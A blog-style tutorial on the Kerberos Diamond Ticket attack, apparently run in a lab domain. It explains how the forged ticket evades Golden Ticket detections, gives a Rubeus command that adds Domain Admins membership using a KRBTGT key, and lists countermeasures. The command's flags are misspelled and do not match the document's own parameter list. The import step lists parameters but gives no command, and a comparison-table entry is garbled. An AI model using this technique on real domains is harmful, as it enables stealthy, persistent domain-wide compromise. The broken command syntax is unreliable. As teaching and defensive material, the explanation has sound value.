Tickets Kerberos - Diamond Ticket
Share
Completing the delivery of Kerberos Tickets , we give way to the Diamond Ticket.
Like a Golden Ticket , a Diamond Ticket is a TGT that can be used to access any service as any user.
A Golden Ticket is created completely offline, encrypted with the KRBTGT hash of the domain in question, and then passed to a user session for use. Because domain controllers do not track TGTs they have legitimately issued, they will readily accept any TGT that is encrypted with their own KRBTGT account hash.
There are two common ways to detect the use of Golden Tickets:
- Perform a search for TGS-REQ requests that do not have a corresponding AS-REQ request
- Perform a search for TGTs that have unusual values, such as a useful life of 10 years, which Mimikatz sets by default
A Diamond Ticket is generated differently, that is, by modifying the fields of a legitimate TGT previously issued by a DC. This is accomplished by first requesting a TGT, decrypting it with the domain's KRBTGT account hash, modifying the desired fields on the ticket, and then re-encrypting it. In this way, the two previously mentioned detections for a Golden Ticket are avoided, since:
- The TGS-REQ will have an associated AS-REQ
- The TGT was issued by a DC, which means it will have all the correct details of the domain's Kerberos policy. While it is true that these details can be accurately falsified during the creation of a Golden Ticket, it is more complex and open to error.
Impact:
A Diamond Ticket, like a Golden Ticket, allows unlimited and persistent access to any resource within the domain until the krbtgt key is changed, which can be a complex and disruptive process.
Explotation
As in the Golden Ticket, it is based on the total commitment of the domain
Ticket creation
To create the Diamond Ticket, we are also going to use the Rubeus tool, executing the following command:
Rubeus.exe diamond /domain:north.sevenkingdom.local /user:eddard.stark /password:FightP3aceAndHonor! /tickerusers:eddar.stark /tickettuserid:1111 /groups:512 /crykey:42a38fe97bcf9c48190e5d77e48faa7d95b7fed838c8910845a86d66d78f188a /nowrap
- Domain: Domain name
- User: User with which the TGT to be modified will be requested
- Password: Password of the user with which the TGT will be requested to modify
- Ticketuser: User to impersonate
- Ticketusersid: SID of the user to impersonate
- Groups: Groups that we want to be added to the ticket (512 -> Domain Admins)
- Krbkey: AES256 key for the KRBTGT account
Import the ticket
- Program: Command to execute where the ticket will be injected
- Domain: Domain name
- Username: Domain user
- Password: User password. It is not necessary to know the user's real password
- Ticket: The ticket created previously
Countermeasures:
- Password Rotation: Regularly change passwords for service accounts. In particular, ensure that the KRBTGT account is protected and that its password is changed periodically, although carefully due to the significant impact it could have on the environment.
- Service Account Security: Ensure that service accounts use strong, unique passwords.
- Segmentation and Limitation of Privileges: Apply the principle of least privilege and segment the network to limit the scope of any potential compromise, ensuring that access to critical resources is restricted and monitored.
- Audit and Monitoring: Configure audits and comprehensive monitoring of authentication activity and Kerberos ticket usage. Proactive Monitoring and Detection: Implement advanced monitoring and detection solutions that can identify anomalous patterns and suspicious activities, including analysis of network traffic, authentication activity, and use of anomalous Kerberos tickets.
- Regular Audits and Reviews: Perform regular security audits and permissions reviews to identify and correct any misconfigurations or potential vulnerabilities.
Feature | Silver Ticket | Golden Ticket | Diamond Ticket |
---|---|---|---|
Aim | Specific service | Access to the entire domain | Access to the entire domain |
Required Credentials | Specific service account | Domain administrator is KRBTGT. | Domain administrator is KRBTGT. |
Impact | Limited access to a service | Unlimited domain access | Unlimited domain access |
Attack Complexity | Moderate | high | Very high |
Key Countermeasures | Password rotation, monitoring | KRBTGT protection, comprehensive monitoring | KRBTGT protection, comprehensive monitoring |